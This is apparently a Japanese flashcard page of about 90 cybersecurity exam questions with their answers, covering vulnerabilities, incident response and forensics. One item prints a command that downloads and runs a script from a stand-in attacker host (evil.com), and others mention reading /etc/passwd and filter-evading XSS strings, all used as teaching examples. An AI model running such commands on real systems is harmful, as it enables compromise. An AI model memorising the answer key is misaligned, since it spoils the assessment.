EXAM #2 | | 暗記メーカー

EXAM #2 |

90問 • 7ヶ月前

問題一覧

Yoyodyne Systems has recently bought out its competitor, Whamiedyne Systems, which went out of business due to a series of data breaches. As a cybersecurity analyst for Yoyodyne, you are assessing Whamiedyne's existing applications and infrastructure. During your analysis, you discover the following URL is used to access an application: /// You change the URL to end with 12346 and notice that a different user's account information is displayed. Which of the following type of vulnerabilities or threats have you discovered?

- Insecure direct object reference

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL: /// Which of the following is true about the results of this search? (SELECT THREE)

- Personalization is turned off, - Returns only files hosted at diontraining.com, - Returns only Microsoft Excel spreadsheets

After analyzing and correlating activity from the firewall logs, server logs, and the intrusion detection system logs, a cybersecurity analyst has determined that a sophisticated breach of the company’s network security may have occurred from a group of specialized attackers in a foreign country over the past five months. Up until now, these cyberattacks against the company network had gone unnoticed by the company’s information security team. How would you best classify this threat?

- Advanced persistent threat (APT)

Consider the following data: /// Which of the following best describes the data presented above?

- A JSON excerpt that describes an APT using the Structured Threat Information eXpression (STIX) format

Which term defines the collection of all points from which an adversary could interact with a system and cause it to function in a way other than how it was designed?

- Attack surface

In which operating system ring is a kernel rootkit typically installed?

- Ring 0

What should a vulnerability report include if a cybersecurity analyst wants it to accurately reflect the assets scanned?

- Virtual hosts

Which of the following security controls provides Windows system administrators with an efficient way to deploy system configuration settings across many devices?

- GPO

Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company?

- Banner grabbing

While conducting a security test to ensure that information about your company’s web server is protected from inadvertent disclosure, you request an HTML file from the webserver and receive the following output: /// Which of the following actions should you take to remediate this vulnerability?

- Set “RemoveServerHeader” to 1 in the URLScan.ini configuration file

A cybersecurity analyst just finished conducting an initial vulnerability scan and is reviewing their results. To avoid wasting time on results that are not really a vulnerability, the analyst wants to remove any false positives before remediating the findings. Which of the following is an indicator that something in their results would be a false positive?

- Items classified by the system as Low or as For Informational Purposes Only

During a vulnerability scan, you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on this information, which of the following do you suspect is true?

- You are scanning a CDN-hosted copy of the site

Which of the following tools would you use to audit a multi-cloud environment?

- ScoutSuite

Which analysis framework provides a graphical depiction of the attacker's approach relative to a kill chain?

- Diamond Model of Intrusion Analysis

Which of the following secure coding best practices ensures a character like < is translated into the < string when writing to an HTML page?

- Output encoding

Which of the following types of digital forensic investigations is most challenging due to the on-demand nature of the analyzed assets?

- Cloud services

Which of the following types of attackers are sophisticated and highly organized people or teams typically sponsored by a nation-state?

- Advanced Persistent Threat

A recent vulnerability scan found several vulnerabilities on an organization’s public-facing IP addresses. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation?

- A buffer overflow that is known to allow remote code execution

Which of the following is the most difficult to confirm with an external vulnerability scan?

- Blind SQL injection

Your company has just announced a change to an "API first" model of software development. As a cybersecurity analyst, you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. Which of the following is the primary basis for an attack against this vulnerability?

- Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution

A cybersecurity analyst is analyzing what they believe to be an active intrusion into their network. The indicator of compromise maps to suspected nation-state group that has strong financial motives, APT 38. Unfortunately, the analyst finds their data correlation lacking and cannot determine which assets have been affected, so they begin to review the list of network assets online. The following servers are currently online: PAYROLL_DB, DEV_SERVER7, FIREFLY, DEATHSTAR, THOR, and DION. Which of the following actions should the analyst conduct first?

- Conduct a data criticality and prioritization analysis

Michelle has just finished installing a new database application on her server. She then proceeds to uninstall the sample configuration files, properly configures the application settings, and updates the software to the latest version according to her company's policy. What best describes the actions Michelle just took?

- Application hardening

Which one of the following methods would provide the most current and accurate information about any vulnerabilities present in a system with a misconfigured operating system setting?

- Agent-based monitoring

A cybersecurity analyst at Yoyodyne Systems just finished reading a news article about their competitor, Whamiedyne Systems, being hacked by an unknown threat actor. Both companies sell to the same basic group of consumers over the internet since their products are used interchangeably by consumers. Which of the following is a valid cybersecurity concern for Yoyodyne Systems?

- They may now be vulnerable to a credential stuffing attack

A cybersecurity analyst is conducting a port scan of 192.168.1.45 using nmap. During the scan, the analyst found numerous ports open, and nmap could not determine the Operating System version of the system installed at 192.168.1.45. The analyst asks you to look over the results of their nmap scan results: /// Based on the scan results, which host type is most likely associated with the given IP address?

- Networked printer

Which of the following would an adversary do during the 'installation' phase of the Lockheed Martin kill chain? (SELECT FOUR)

- "Time stomp" on a malware file to appear as if it is part of the operating system, - Install a webshell on a serve, - Create a point of presence by adding services, scheduled tasks, or AutoRun keys, - Install a backdoor/implant on a client victim

A software assurance laboratory performs a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. Which of the following is the laboratory performing?

- Fuzzing

Which of the following technologies is NOT a shared authentication protocol?

- LDAP

What technology is NOT PKI x.509 compliant and cannot be used in various secure functions?

- Blowfish

Dion Consulting Group has recently received a contract to develop a networked control system for a self-driving car. The company's CIO is concerned about the liability of a security vulnerability being exploited that may result in the death of a passenger or an innocent bystander. Which of the following methodologies would provide the single greatest mitigation if successfully implemented?

- Formal methods of verification

From which entity does a User Agent request a resource during a SAML transaction?

- Service provider (SP)

According to the Center for Internet Security's system design recommendation, which of the following control categories would contain information on the best security practices to implement within the SDLC?

- Application software security

What is the lowest layer (bottom layer) of a bare-metal virtualization environment?

- Physical hardware

William would like to use full-disk encryption on his laptop. He is worried about slow performance, though, so he has requested that the laptop have an onboard hardware-based cryptographic processor. Based on this requirement, what should William ensure the laptop contains?

- TPM

When using the netstat command during an analysis, which of the following connection status messages indicates whether an active connection between two systems exists?

- ESTABLISHED

While performing a vulnerability scan, Christina discovered an administrative interface to a storage system is exposed to the internet. She looks through the firewall logs and attempts to determine whether any access attempts have occurred from external sources. Which of the following IP addresses in the firewall logs would indicate a connection attempt from an external source?

- 192.186.1.100

You are a cybersecurity analyst and your company has just enabled key-based authentication on its SSH server. Review the following log file: /// Which of the following actions should be performed to secure the SSH server?

- Disable password authentication for SSH

You are analyzing a Linux server that you suspect has been tampered with by an attacker. You went to the terminal and typed 'history' into the prompt and see the output: //// Which of the following best describes what actions were performed by this line of code?

- Routed traffic destined for the diontraining.com domain to the localhost

You are creating a script to filter some logs so that you can detect any suspected malware beaconing. Which of the following is NOT a typical means of identifying a malware beacons behavior on the network?

- The beacon's protocol

Which security tool is used to facilitate incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment?

- SOAR

You just received a notification that your company's email servers have been blacklisted due to reports of spam originating from your domain. What information do you need to start investigating the source of the spam emails?

- The full email header from one of the spam messages

Which of the following is NOT a means of improving data validation and trust?

- Decrypting data at rest

Your company was recently the victim of a cross-site scripting attack. The system administrators claim this wasn't possible since they performed input validation using REGEX to alert on any strings that contain the term "[Ss]cript" in them. Which of the following statements concerning this attack is true?

- The REGEX expression to filter using "[Ss]cript" is insufficient. As an attacker could use SCRIPT or SCRipt or %53CrIPT to evaded it

Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect if an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring?

- Behavior

Dion Training allows its visiting business partners from CompTIA to use an available Ethernet port in their conference room to establish a VPN connection back to the CompTIA internal network. The CompTIA employees should obtain internet access from the Ethernet port in the conference room, but nowhere else in the building. Additionally, if a Dion Training employee uses the same Ethernet port in the conference room, they should access Dion Training's secure internal network. Which of the following technologies would allow you to configure this port and support both requirements?

- Implement NAC

The CIO has recently made a purchasing decision to install a new security appliance that will automatically sandbox all attachments as they enter the enterprise network to run dynamic and static code analysis on them. Which of the following questions about the appliance should you consider as the SOC manager responsible for operating this new appliance for the company? (SELECT FOUR)

- How will the appliance receive updated signatures and scanning engines?, - Do you have security personnel and procedures in place to review the output from this appliance and take action where appropriate?, - Does the new appliance provide a detailed report or alert showing why it believes an attachment is malicious?, - How will the appliance receive security patches and updates?

Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long text strings and then began using the sudo command to carry out actions. What type of attack has just taken place?

- Privilege escalation

Which of the following provides the detailed, tactical information that CSIRT members need when responding to an incident?

- Procedures

Which of the following methods should a cybersecurity analyst use to locate any instances on the network where passwords are being sent in cleartext?

- Full packet capture

According to the US Department of Health and Human Services, notification of the individuals affected by a data breach containing PHI is required when how many individuals are affected?

- 1

Which of the following proprietary tools is used to create forensic disk images without making changes to the original evidence?

- FTK Imager

Shawn needs to boot a system to remediate it. The system was compromised by an attack and had a malicious program installed by creating a RunOnce key in the registry. What can Shawn do to boot the computer and prevent the RunOnce from executing the malicious program listed in the registry key?

- Boot with Safe Mode

You are reverse engineering a malware sample using the Strings tool when you notice the code inside appears to be obfuscated. You look at the following line of output on your screen: //// Based on the output above, which of the following methods do you believe the attacker used to prevent their malicious code from being easily read or analyzed?

- Base64

Following an incident, the incident response team has generated many recommendations for additional controls and items to be purchased to prevent future recurrences. Which of the following approaches best describes what the organization should do next?

- Submit a prioritized list with all of the recommendations for review, procurement, and installation

You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first?

- L3 cache

You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Unfortunately, your network has several different operating systems in use, but you only have one machine available to test the patches on. What is the best environment to utilize to perform the testing of the patches before deployment?

- Virtualization

You are working as a junior cybersecurity analyst and utilize a SIEM to support investigations into ongoing incidents. The SIEM is configured to collect data from numerous sources across the network, including network sensors, routers, switches, firewalls, hosts, and servers. Unfortunately, due to the number of data sources, you have data about a particular event being detected by different sensors and devices. Which of the following must you ensure to make sense of all the data being collected by your SIEM before analyzing it?

- Data correlation

You are analyzing the logs of a forensic analysts workstation and see the following: /// What does the bs=1M signify in the command list above?

Sets the block size

Fail to Pass Systems recently installed a break and inspect appliance that allows their cybersecurity analysts to observe HTTPS traffic entering and leaving their network. Consider the following output from a recorded session captured by the appliance: // Which of the following statements is true?

A request to issue the command "cat /etc/passwd" occurred but additional analysis is required to verify if the file was downloaded

You are reverse engineering a piece of malware recovered from a retailer’s network for analysis. They found that the malicious code was extracting track data from their customer's credit cards during processing. Which of the following types of threats would you classify this malware as?

- POS malware

Hilda needs a cost-effective backup solution that would allow for the restoration of data within a 24 hour RPO. The disaster recovery plan requires that backups occur during a specific timeframe each week, and then the backups should be transported to an off-site facility for storage. What strategy should Hilda choose to BEST meet these requirements?

- Create a daily incremental backup to tape

Your company is required to remain compliant with PCI-DSS due to the type of information processed by your systems. If there was a breach of this data, which type of disclosure would you be required to provide during your incident response efforts?

- Notification to your credit card processor

Jay is replacing his organization's current vulnerability scanner with a new tool. As he begins to create the scanner's configurations and scanning policy, he notices a conflict in the settings recommended between different documents. Which of the following sources must Jay follow when trying to resolve these conflicts?

- Corporate policy

Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host?

- ftp

Which of the following policies should contain the requirements for removing a user's access when an employee is terminated?

- Account management policy

What type of weakness is John the Ripper used to test during a technical assessment?

- Passwords

Which of the following terms refers to the action taken to minimize the impact of a vulnerability?

- Mitigation

Why is regular vulnerability management reporting critical to an organization's security posture?

- To aid in effective prioritization and remediation

In managing the cybersecurity of a multinational banking corporation, how would the use of a specific Key Performance Indicator such as 'Time To Patch' enhance the overall effectiveness and responsiveness of the vulnerability management process, especially considering the high-risk nature of the banking sector?

- It would give the organization an accurate measurement of current patching efficiency

What key data point should be included in a vulnerability report to help prioritize remediation efforts for multiple vulnerabilities?

- Risk score

Among the following vulnerabilities, which one was reported as a "Top 10" due to its common occurrence and the potential severity of its impact?

- Cross-Site Scripting (XSS)

Which one of the following vulnerabilities is commonly referred to as a "Top 10" due to its frequent occurrence and the severe repercussions associated with it?

- Injection Attacks

What is the primary role of customer communication during an incident response?

- It maintains transparency and trust with customers by keeping them informed about the situation

What is the primary purpose of the 'Mean Time to Remediate' (MTTR) metric in incident response?

- It provides a measure of the efficiency of an organization's remediation efforts

Your company recently faced a data breach, causing significant loss. You're a part of the incident response team and are tasked with evaluating how long it took to mitigate the effects of the breach from the moment it was detected. What KPI would help you measure this duration?

- Mean time to remediate

Your organization has experienced a significant cybersecurity incident, and an executive summary of the incident has been prepared. However, the board of directors has requested detailed evidence supporting the summary. Where would they typically find this information?

- In the evidence section of the incident response report

Following a cyber incident in your organization, you've been tasked with informing all relevant stakeholders about the event, its impact, and how it was handled. The stakeholders range from internal teams to external partners and customers. In the context of incident response, what is this process known as?

- Stakeholder identification and communication

As part of an incident response team, you've just managed a major security incident that affected your organization's operations. The management wants to know how long it took from when the incident was first detected to when the response was initiated. What key metric would best provide this information?

- Mean time to respond

An incident responder identifies the perpetrator of a security incident, the victim (a database server), the server used by the attacker, and the SQL injection technique used. Which framework is being employed for this intrusion analysis?

- Diamond Model of Intrusion Analysis

What is the main purpose of the Open Source Security Testing Methodology Manual (OSSTMM)?

- Providing a structured approach to security testing

What is the primary goal of the OWASP Testing Guide?

- Providing a framework for web application security testing

In the Colonial Pipeline ransomware attack, the DarkSide ransomware group fulfilled their intent by encrypting files and demanding a ransom. Which phase of the Cyber Kill Chain does this represent?

- Actions and Objectives

In the WannaCry ransomware attack, the NSA's leaked EternalBlue exploit was used to propagate the ransomware. In the context of the Diamond Model of Intrusion Analysis, what does the EternalBlue exploit represent?

- Capability

In the Diamond Model of Intrusion Analysis, which of the four components represents the entity or individual who conducts the cyber attack?

- Adversary

After the SolarWinds supply chain attack, a software company that also used SolarWinds' software decided to deploy an intrusion detection system (IDS) to monitor network traffic and alert for any signs of malicious activity. In the context of this scenario, what incident response activity is the software company performing?

- Implementing compensating controls

Following a significant data breach, a multinational corporation has hired a third-party firm to systematically search through its IT systems to identify the intrusion's origin and extent. This external firm is also expected to provide a detailed report on their findings. Which of the following post-incident activities BEST describes what the corporation is performing in this scenario?

- Forensic analysis

The 2017 WannaCry ransomware attack exploited a specific vulnerability in Microsoft's implementation of the SMB protocol, impacting thousands of computers worldwide. Which of the following patches, if applied timely, could have prevented this large-scale compromise?

- MS17-010

You are a member of a cybersecurity team and have noticed that an account has been repeatedly attempting to access restricted areas of your company's network. This account has never attempted this before, and the user has no need for this level of access in their job. What would this situation best exemplify?

- Abnormal Account Activity

During a recent incident investigation, you come across the following command in a server log: wget http://evil.com/malicious.sh -O /tmp/malicious.sh && chmod 755 /tmp/malicious.sh && /tmp/malicious.sh What type of activity does this command represent?

- Malware Download and Execution

Your security team has discovered that some of the organization's AWS S3 buckets are publicly accessible due to a misconfiguration. What could be the main concern associated with this type of misconfiguration?

- Unauthorized access to sensitive data stored in the S3 buckets

THE P.T: 1 CHRONICLE: ( ex.9 )

The R.S.S.H Delivery Company · 90問 · 6ヶ月前

THE P.T: 1 CHRONICLE: ( ex.9 )